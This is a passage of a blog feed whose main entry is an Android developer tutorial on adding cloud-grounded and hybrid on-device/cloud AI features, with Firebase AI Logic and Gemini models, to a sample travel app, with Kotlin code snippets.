      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s72-c/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s72-c/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi961epgT3N_Za_k2-pCJ30tegn7DM-Umh1LWh7Q4NxhryR5H57JB00zKQcek56ccAvEM95i6wyXWWCZZ7486_Gq1ewxPHtsMY13UVsVTmndAvkOJtHPjUXuZ3XW_yBEFtlOr2ocBFIKr0PCRZhIRs67h6bX6zDKihwcxQs8bGbYTqIp5azuBKcX4PNMMY/s72-c/AFD%20-%20%5BABL_104%5D%20JetPacker%20AppFunctions_Meta.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html</id>
    <title>Build intelligent Android apps: Cloud and hybrid inference</title>
    <updated>2026-07-21T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTpa22SxEltoebLZYO_34iRtahN8z5tA3tnIryIii0s4_conN5qFYfmNro6nmZBfsgiZeRLtru-gE4XO2mf-RBDyIo00kf3QunWwUO-SICHkVSv0exAQQ4qA0KzjMGRpA8qj1TSMP0Ffe0FzrEc_S1zBaakKzCZFpqYLXqds9Zqmqr8yyeSgyNl9U0s/s2469/features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Meta.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Thomas Ezan, Jolanda Verhoef, Caren Chang, Senior Developer Relations Engineers, Android Developer Relations&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2fO3T2xckksQ9pk3RUNPxZqqq2CyaifXnju0lCCpbfwJ4gZyq-df0kM_mK1TMV0F9YCMo19Ba9NvFAiUpzDH6Wlk_RyonRCK5Ono25CYyQ7xGC3q70mUhyphenhyphenOOYJ-5JX2KlFP1lIA3ULIhH86_hP2ptO0AllUIf6ZVh-SqoXVWcXrM8m3hHCkhGwZYfP4/s8583/AFD%20-%20%5BABL_101%5D%20Building%20AI%20features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2fO3T2xckksQ9pk3RUNPxZqqq2CyaifXnju0lCCpbfwJ4gZyq-df0kM_mK1TMV0F9YCMo19Ba9NvFAiUpzDH6Wlk_RyonRCK5Ono25CYyQ7xGC3q70mUhyphenhyphenOOYJ-5JX2KlFP1lIA3ULIhH86_hP2ptO0AllUIf6ZVh-SqoXVWcXrM8m3hHCkhGwZYfP4/s1600/AFD%20-%20%5BABL_101%5D%20Building%20AI%20features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Welcome back to the blog post series "&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank"&gt;Build intelligent Android apps&lt;/a&gt;" where we take a basic Android app and transform it into a &lt;b&gt;personalized&lt;/b&gt;, &lt;b&gt;intelligent&lt;/b&gt;, and &lt;b&gt;agentic&lt;/b&gt; experience. In our &lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;previous post&lt;/a&gt; we explored how to build intelligent on-device features using Gemini Nano through ML Kit's Prompt API.&lt;/p&gt;

&lt;p&gt;In this post, we will look at how you can leverage &lt;b&gt;&lt;a href="https://firebase.google.com/docs/ai-logic"&gt;Firebase AI Logic&lt;/a&gt; &lt;/b&gt;to build cloud-hosted and hybrid AI features:&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Grounding answers in real-world context&lt;/li&gt;
  &lt;li&gt;Routing requests dynamically between cloud and local execution using hybrid inference&lt;/li&gt;
  &lt;li&gt;Translating content with custom routing systems&lt;/li&gt;
&lt;/ul&gt;

&lt;div style="margin: 0px auto; width: 100%;"&gt;
  
  
&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Sometimes a use case requires AI models with greater world knowledge, a much larger context window, or the ability to handle complex queries. In those scenarios, we can leverage cloud models.&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Other times, you want the best of both worlds: using hybrid inference to run on-device when available to lower costs, while falling back to the cloud to ensure compatibility for all devices.&lt;/p&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwlTUF1Kzkbrf2w64KO3jZJZZ_wLEu34vq6Cb7PX2alVUhFVdbkiWuXCkzUS-bPJkHMbmuNJ_Ov0HYZzujr69jCU9gPvmKaKMZt2q4-TolSDFCLABBIY1IBRY9Zn7D5S10hFcJD2kuVCm3N2glpqDJoHiqAZat4z6oyXxxwH4ZCGVBgfPObMevoJrgNPg/s8000/features_upscaled.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwlTUF1Kzkbrf2w64KO3jZJZZ_wLEu34vq6Cb7PX2alVUhFVdbkiWuXCkzUS-bPJkHMbmuNJ_Ov0HYZzujr69jCU9gPvmKaKMZt2q4-TolSDFCLABBIY1IBRY9Zn7D5S10hFcJD2kuVCm3N2glpqDJoHiqAZat4z6oyXxxwH4ZCGVBgfPObMevoJrgNPg/s1600/features_upscaled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;em style="text-align: left;"&gt;Cloud and hybrid features in Jetpacker: Museum assistant with web grounding, hybrid restaurant review drafting, and&amp;nbsp;
  support chat featuring custom-routed live translation.&lt;/em&gt;&lt;/div&gt;

&lt;p&gt;Let’s look at how we implemented three cloud and hybrid features in &lt;a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank"&gt;Jetpacker&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;a museum assistant with web grounding&lt;/li&gt;
  &lt;li&gt;hybrid restaurant review drafting&lt;/li&gt;
  &lt;li&gt;hotel support chat featuring custom-routed live translation.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Use LLM grounding for up-to-date informationMuseum assistant chatbot with LLM grounding&lt;/h2&gt;
&lt;p&gt;The &lt;b&gt;Museum assistant &lt;/b&gt;is an interactive chatbot designed to help users plan their museum visits. It provides visitors with up-to-date details regarding specific exhibits, current opening hours, ticket pricing, and more.&lt;/p&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em style="text-align: left;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3pxeCVJfOo5G7McNB4RCIhoCUch8CHSAWI7gHijJJcE95b0gbu3lyAO1xIWc6mKllkpylSPBnVfU6RYnwfay4z6dH7TlufPuNw3Lw7s-bEuR4Ajx8IHK8k6zJcOHitqMRdDv8EVL-fCN6uuDo1QTnOgk_RW-AEM1_hZaJWbCGezMQF_D9Hia-Rm2T4-c/s4880/museum_assistant_upscaled.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3pxeCVJfOo5G7McNB4RCIhoCUch8CHSAWI7gHijJJcE95b0gbu3lyAO1xIWc6mKllkpylSPBnVfU6RYnwfay4z6dH7TlufPuNw3Lw7s-bEuR4Ajx8IHK8k6zJcOHitqMRdDv8EVL-fCN6uuDo1QTnOgk_RW-AEM1_hZaJWbCGezMQF_D9Hia-Rm2T4-c/w314-h640/museum_assistant_upscaled.png" width="314" /&gt;&lt;/a&gt;&lt;/div&gt;Museum assistant is a chatbot that answers questions, such as&amp;nbsp;&lt;/em&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em style="text-align: left;"&gt;‘How can I get a ticket discount for Le Louvre?’&lt;/em&gt;&lt;/div&gt;

&lt;p&gt;When building AI features, getting the model to answer with fresh, accurate, and specific real-world information is a common challenge. While cloud models possess massive amounts of world knowledge, they might not know about seasonal exhibits or the current day’s opening hours.&amp;nbsp;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8He5M2JC5EwXZwa-M52UAXHSO4dWy4gx3aZoY2ZXM-x25pV4kc6BsICe_fG4Zn6-R37_UgTQ8LBSsrNcP50e3aQLgxNbHOfWLBqzaSqQ78ZDmNEJadZNc-I5bduHr0UtWOxYMTFAHgffxcuzaETHPe3lvfRod2rkeOUXnRaLJ_vIiAfO_xRKpESbX3L8/s8000/grounding_upscaled.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8He5M2JC5EwXZwa-M52UAXHSO4dWy4gx3aZoY2ZXM-x25pV4kc6BsICe_fG4Zn6-R37_UgTQ8LBSsrNcP50e3aQLgxNbHOfWLBqzaSqQ78ZDmNEJadZNc-I5bduHr0UtWOxYMTFAHgffxcuzaETHPe3lvfRod2rkeOUXnRaLJ_vIiAfO_xRKpESbX3L8/s1600/grounding_upscaled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;em style="text-align: left;"&gt;&lt;br /&gt;Grounding data is added to the context window to enable the model&lt;/em&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em style="text-align: left;"&gt;&amp;nbsp;to answer questions correctly and accurately.&lt;/em&gt;&lt;/div&gt;

&lt;p&gt;To bridge this gap, we can use grounding techniques to add extra context to the model’s context window. The &lt;a href="https://firebase.google.com/products/firebase-ai-logic" target="_blank"&gt;Firebase AI Logic SDK&lt;/a&gt; supports three types of grounding:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;&lt;a href="https://firebase.google.com/docs/ai-logic/url-context"&gt;URL grounding&lt;/a&gt;:&lt;/strong&gt; Grounding responses using content from a specific webpage (e.g. current ticket prices or museum rules).&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;&lt;a href="https://firebase.google.com/docs/ai-logic/grounding-google-search"&gt;Google Search grounding&lt;/a&gt;:&lt;/strong&gt; Letting the model query the real-time Google search index for up-to-date details.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;&lt;a href="https://firebase.google.com/docs/ai-logic/grounding-google-maps"&gt;Maps grounding&lt;/a&gt;:&lt;/strong&gt; Using Google Maps location data.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In Jetpacker, we dynamically construct the available tools based on enabled feature flags and initialize the generative model using the Firebase AI SDK:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.firebase:firebase-ai-logic")

private var toolList = mutableListOf&amp;lt;Tool&amp;gt;()

init {
    if (ENABLE_SEARCH_GROUNDING) {
        toolList.add(Tool.googleSearch())
    }
    if (ENABLE_URL_GROUNDING) {
        toolList.add(Tool.urlContext())
    }
}

private val generativeModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash",
        systemInstruction = content {
            text("You are a helpful museum assistant answering questions about a museum. Use plain text.")
        },
        tools = toolList
    )&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;When the user queries the assistant, if URL grounding is enabled, we append the specific museum resource URLs directly into the prompt:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;val groundingText = if (FeatureFlags.ENABLE_URL_GROUNDING) {
    "\n If the following message above is about the rules and terms to visit Le Louvre, " +
    "if needed answer this urls ${urlList.joinToString()}"
} else {
    ""
}

val prompt = "$text $groundingText"

var response = chat.sendMessage(prompt)
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Hybrid inference: On-device review generation with Maps deep link&lt;/h2&gt;
&lt;p&gt;Not every AI task requires a cloud-based model, and not every device is online. To help developers balance latency, cost, and offline availability, we recently introduced the &lt;a href="https://firebase.google.com/docs/ai-logic/hybrid/android/get-started?api=dev"&gt;Firebase API for Hybrid Inference&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In Jetpacker, the &lt;b&gt;restaurant review&lt;/b&gt; feature lets users review select topics and automatically drafts a review. To enable this for all users, we prioritize local execution with Gemini Nano, and fall back to cloud models on devices that don’t support Gemini Nano.&amp;nbsp;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa1o2Zh3v3Babi7gGmzOFYAKPEgS0HWmvisiKgK-QsSRh_ZhjTjuUYSS_QIH0JQw9NsqrkYe4Quud6cfCGwVc61_7HKcACj6c9yywWySn5xyHGgemBR5tYPP8q3bmLadaN6uLXspE9LqrcZkVdckEGHWDhdfYVa-xo8QomDaRn03mau2fHVyK0Fr1FaU/s4680/review_upscaled.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa1o2Zh3v3Babi7gGmzOFYAKPEgS0HWmvisiKgK-QsSRh_ZhjTjuUYSS_QIH0JQw9NsqrkYe4Quud6cfCGwVc61_7HKcACj6c9yywWySn5xyHGgemBR5tYPP8q3bmLadaN6uLXspE9LqrcZkVdckEGHWDhdfYVa-xo8QomDaRn03mau2fHVyK0Fr1FaU/w327-h640/review_upscaled.png" width="327" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;The restaurant review feature uses hybrid inference to draft a review based on topics&lt;/em&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;/div&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.firebase:firebase-ai-logic")
// implementation("com.google.firebase:firebase-ai-ondevice:16.0.0-beta03")


// Initialize the model with hybrid routing configuration
val reviewModel = Firebase.ai.generativeModel(
    modelName = "gemini-3.1-flash-lite",
    onDeviceConfig = OnDeviceConfig(
        inferenceMode = InferenceMode.PREFER_ON_DEVICE
    )
)&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The Hybrid Inference API supports four distinct routing modes:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;PREFER_ON_DEVICE:&lt;/strong&gt; Prioritizes local execution and falls back to cloud if Gemini Nano is unavailable.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;PREFER_IN_CLOUD:&lt;/strong&gt; Prioritizes cloud execution and falls back to on-device if the device goes offline.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;ONLY_ON_DEVICE:&lt;/strong&gt; Restricts execution strictly to the device.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;ONLY_IN_CLOUD:&lt;/strong&gt; Restricts execution strictly to the cloud.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once the review is generated, we copy it to the clipboard and use an intent to open Google Maps directly to the restaurant's review page, providing a seamless user experience:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;private fun copyAndOpenMapsReview(context: Context, reviewText: String, placeId: String) {
    val clipboard = context.getSystemService(Context.CLIPBOARD_SERVICE) as ClipboardManager
    val clip = ClipData.newPlainText("User Review", reviewText)
    clipboard.setPrimaryClip(clip)

    val uri = Uri.parse("https://search.google.com/local/writereview/mobile?placeid=$placeId")
    val intent = Intent(Intent.ACTION_VIEW, uri).apply {
        setPackage("com.google.android.apps.maps")
    }
    context.startActivity(intent)
}&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Custom hybrid routing: Hotel support chat translation with simulated personas&lt;/h2&gt;
&lt;p&gt;The &lt;b&gt;hotel support chat&lt;/b&gt; was built to let users finalize logistics and check on hotel details. This feature uses system instructions to configure a localized receptionist assistant. By passing specific information—such as the preferred language and hotel information—in the instructions, we can set up a conversational persona representing a specific hotel.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;private val generativeModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        systemInstruction = content {
            text("""
              You are a helpful hotel receptionist at $hotelName only speaking $language. 
              Answer politely in $language. The bar closes at 10pm and breakfast is from 7am to 10am.
              There's someone at the desk 24/7. You can retrieve your luggage from the storage room 
              at the back of the lobby at any time.
              """)
        },
        modelName = "gemini-3-flash-preview"
    )&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Because receptionist responses are in the hotel's local language (for example, French for Hotel Le Meurice in Paris), we need to translate messages to the user’s preferred language.&amp;nbsp;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikIB_NnUYK8GnEpI3foNLO2_AQ2lNZhoc9gFB-CjERDjMwrdQ2T45y6jzrJAafi4Jz7eF_SBkXG7csDwpajKctp5yo1hsBjIacIfK3aHvvQjCUu22qZBj7dLl5Q4aGFJRD4hwTlMMNgZD8sIuYpCrRjMmpa5ybXDzi9nkTMZoiJOEn8jLmqBsgTXcVTDY/s4112/translation_upscaled.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikIB_NnUYK8GnEpI3foNLO2_AQ2lNZhoc9gFB-CjERDjMwrdQ2T45y6jzrJAafi4Jz7eF_SBkXG7csDwpajKctp5yo1hsBjIacIfK3aHvvQjCUu22qZBj7dLl5Q4aGFJRD4hwTlMMNgZD8sIuYpCrRjMmpa5ybXDzi9nkTMZoiJOEn8jLmqBsgTXcVTDY/s1600/translation_upscaled.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;Hotel support chat messages are automatically translated to the user’s preferred language&amp;nbsp;&lt;/em&gt;&lt;/div&gt;&lt;/em&gt;&lt;/div&gt;

&lt;p&gt;While hybrid models can configure simple routing preferences, complex scenarios require custom routing logic. In Jetpacker, we implement a custom routing stack that takes into account:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;Language identification:&lt;/strong&gt; Using the on-device &lt;a href="https://developers.google.com/ml-kit/language/identification/android"&gt;ML Kit Language Identification API&lt;/a&gt;, we can detect the incoming message language.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;On-device translation (Gemini Nano):&lt;/strong&gt; &lt;a href="https://developers.google.com/ml-kit/genai/prompt/android"&gt;ML Kit’s Prompt API&lt;/a&gt; lets us translate common language pairs directly on the device, saving bandwidth and cloud cost.&lt;/li&gt;
  &lt;li&gt;&lt;strong&gt;Cloud translation (Gemini 3 Flash):&lt;/strong&gt; For more complex languages, we use Gemini Flash 3 to get a higher quality translation.&lt;/li&gt;
&lt;/ul&gt;

&lt;pre&gt;&lt;code&gt;// implementation("com.google.android.gms:play-services-mlkit-language-id:17.0.0")&amp;nbsp;

// ML Kit for Language Identification (powered by Google Play Services)
private val languageIdentifier = LanguageIdentification.getClient()

// On-device translator model (prefer Gemini Nano) for translating common language pairs
private val hybridTranslationModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash",
        onDeviceConfig = OnDeviceConfig(mode = InferenceMode.PREFER_ON_DEVICE)
    )

// Cloud translator model for more complex language pairs
private val cloudTranslationModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash"
    )&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;When a message needs to be translated, we identify the source language and apply our custom routing logic, executing either on-device or cloud translation:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;fun translateMessage(message: SupportChatMessage) {
    viewModelScope.launch {
        // 1. Detect language using ML Kit Language Identification
        val sourceLang = try {
            Tasks.await(languageIdentifier.identifyLanguage(message.text))
        } catch (e: Exception) {
            "Undefined"
        }

        // 2. Custom routing: we've verified the translation quality for English and Korean with Gemini Nano, and will translate message on-device for those two languages
        val routeToCloud = sourceLang != "en" &amp;amp;&amp;amp; sourceLang != "kr"

        val prompt = "Translate the following text to $selectedLanguage. Just return the translated sentence: ${message.text}."

        val (translatedText, routePrefix) = if (routeToCloud) {
            val result = cloudTranslationModel.generateContent(prompt)
            result.text to "[Cloud]"
        } else {
            val result = hybridTranslationModel.generateContent(prompt)
            result.text to "[On-Device]"
        }

        if (translatedText != null) {
            _translations.update { current -&amp;gt;
                current + (message.id to "$routePrefix: $translatedText")
            }
        }
    }
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;In this example, the custom routing logic only takes into consideration the translation’s source and target language. However, based on your app’s use case, you can expand the routing logic to include other factors such as the on-device model version, network connectivity, battery status, and more.&lt;/p&gt;

&lt;h2&gt;Securing the AI Pipelines: Firebase App Check&lt;/h2&gt;
&lt;p&gt;Lastly, using AI in the cloud opens up possibilities of API key abuse or unauthorized billing. To secure API calls, we integrated &lt;a href="https://firebase.google.com/docs/app-check"&gt;&lt;b&gt;Firebase App Check&lt;/b&gt;&lt;/a&gt; using both Play Integrity (production) and the local Debug Provider (for local development or emulators).&lt;/p&gt;

&lt;p&gt;In the &lt;a href="https://github.com/android/ai-samples/blob/main/jetpacker/android/app/src/main/kotlin/com/example/jetpacker/JetPackerApplication.kt"&gt;JetPackerApplication.kt&lt;/a&gt; file, we install the debug provider at startup and trigger anonymous authentication to establish a secure user session:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;//  implementation("com.google.firebase:firebase-appcheck-playintegrity")&amp;nbsp;
//  implementation("com.google.firebase:firebase-appcheck-debug")&amp;nbsp;&amp;nbsp;
//  implementation("com.google.firebase:firebase-auth")&amp;nbsp;

override fun onCreate() {
    super.onCreate()
    Firebase.initialize(context = this)
    Firebase.appCheck.installAppCheckProviderFactory(
        DebugAppCheckProviderFactory.getInstance()
    )
    Firebase.auth.signInAnonymously()
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;When building locally on an emulator, App Check prints a local token secret to logcat:&lt;/p&gt;

&lt;p&gt;Enter this debug secret into the allow list in the Firebase Console: a8c2dd4c-xxxx-xxxx-xxxx-ef6c114ba27e&lt;/p&gt;

&lt;p&gt;Once registered in the Firebase console, local requests are fully verified and authenticated by App Check, protecting our backend while letting us test the app locally.&lt;/p&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;By combining cloud model capabilities (grounding, system instructions) with on-device capabilities (hybrid routing, translation, security app checks), we created a travel app that is smart, secure, and available offline.&lt;/p&gt;

&lt;p&gt;Check out the &lt;a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank"&gt;full source code for Jetpacker on GitHub&lt;/a&gt;, and explore the Firebase documentation to get started:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://firebase.google.com/docs/ai-logic/get-started"&gt;Firebase AI Logic Documentation&lt;/a&gt;&lt;br /&gt;&lt;a href="https://firebase.google.com/docs/ai-logic/hybrid/android/get-started"&gt;Firebase Hybrid Inference API&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;Learn more&lt;/h2&gt;
&lt;p&gt;Check out the other parts of this blog post series:&lt;/p&gt;
&lt;p&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html"&gt;Part 1&lt;/a&gt;:&lt;/b&gt; Introduction of the app and a high-level overview.&lt;br /&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"&gt;Part 2&lt;/a&gt;: &lt;/b&gt;On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.&lt;br /&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"&gt;Part 3 (this post!):&lt;/a&gt;&lt;/b&gt; Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.&lt;br /&gt;&lt;b&gt;&lt;a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"&gt;Part 4:&lt;/a&gt; &lt;/b&gt;System integration. Integrating with the Android intelligence system using AppFunctions.&amp;nbsp;&lt;br /&gt;&lt;b&gt;Part 5 (coming soon):&lt;/b&gt; In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.&lt;/p&gt;

&lt;p&gt;Interested in more on Android Development? Follow Android Developers on &lt;a href="https://www.youtube.com/@AndroidDevelopers"&gt;YouTube&lt;/a&gt; or &lt;a href="https://www.linkedin.com/showcase/androiddev/"&gt;LinkedIn&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;All code snippets in this blog post follow the following copyright notice:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0&lt;/code&gt;&lt;/pre&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-21T13:00:00+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTpa22SxEltoebLZYO_34iRtahN8z5tA3tnIryIii0s4_conN5qFYfmNro6nmZBfsgiZeRLtru-gE4XO2mf-RBDyIo00kf3QunWwUO-SICHkVSv0exAQQ4qA0KzjMGRpA8qj1TSMP0Ffe0FzrEc_S1zBaakKzCZFpqYLXqds9Zqmqr8yyeSgyNl9U0s/s72-c/features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Meta.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTpa22SxEltoebLZYO_34iRtahN8z5tA3tnIryIii0s4_conN5qFYfmNro6nmZBfsgiZeRLtru-gE4XO2mf-RBDyIo00kf3QunWwUO-SICHkVSv0exAQQ4qA0KzjMGRpA8qj1TSMP0Ffe0FzrEc_S1zBaakKzCZFpqYLXqds9Zqmqr8yyeSgyNl9U0s/s72-c/features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Meta.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTpa22SxEltoebLZYO_34iRtahN8z5tA3tnIryIii0s4_conN5qFYfmNro6nmZBfsgiZeRLtru-gE4XO2mf-RBDyIo00kf3QunWwUO-SICHkVSv0exAQQ4qA0KzjMGRpA8qj1TSMP0Ffe0FzrEc_S1zBaakKzCZFpqYLXqds9Zqmqr8yyeSgyNl9U0s/s72-c/features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Meta.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-07-20-Michaels-Unveils-Ask-Mike-AI-Assistant-Built-With-Google-Clouds-Gemini-Enterprise-for-Customer-Experience</id>
    <title>Michaels Unveils ‘Ask Mike’ AI Assistant, Built With Google Cloud’s Gemini Enterprise for Customer Experience</title>
    <updated>2026-07-21T13:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-07-20-Michaels-Unveils-Ask-Mike-AI-Assistant-Built-With-Google-Clouds-Gemini-Enterprise-for-Customer-Experience" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-07-21T13:00:00+00:00</published>
    <media:group>
      <media:content url="https://www.googlecloudpresscorner.com/file.php/182371/GooglexMichaels.png?thumbnail=144" type="image/png" medium="image"/>
      <media:thumbnail url="https://www.googlecloudpresscorner.com/file.php/182371/GooglexMichaels.png?thumbnail=144"/>
    </media:group>
    <link rel="enclosure" href="https://www.googlecloudpresscorner.com/file.php/182371/GooglexMichaels.png?thumbnail=144" type="image/png" length="0"/>
  </entry>
  <entry>
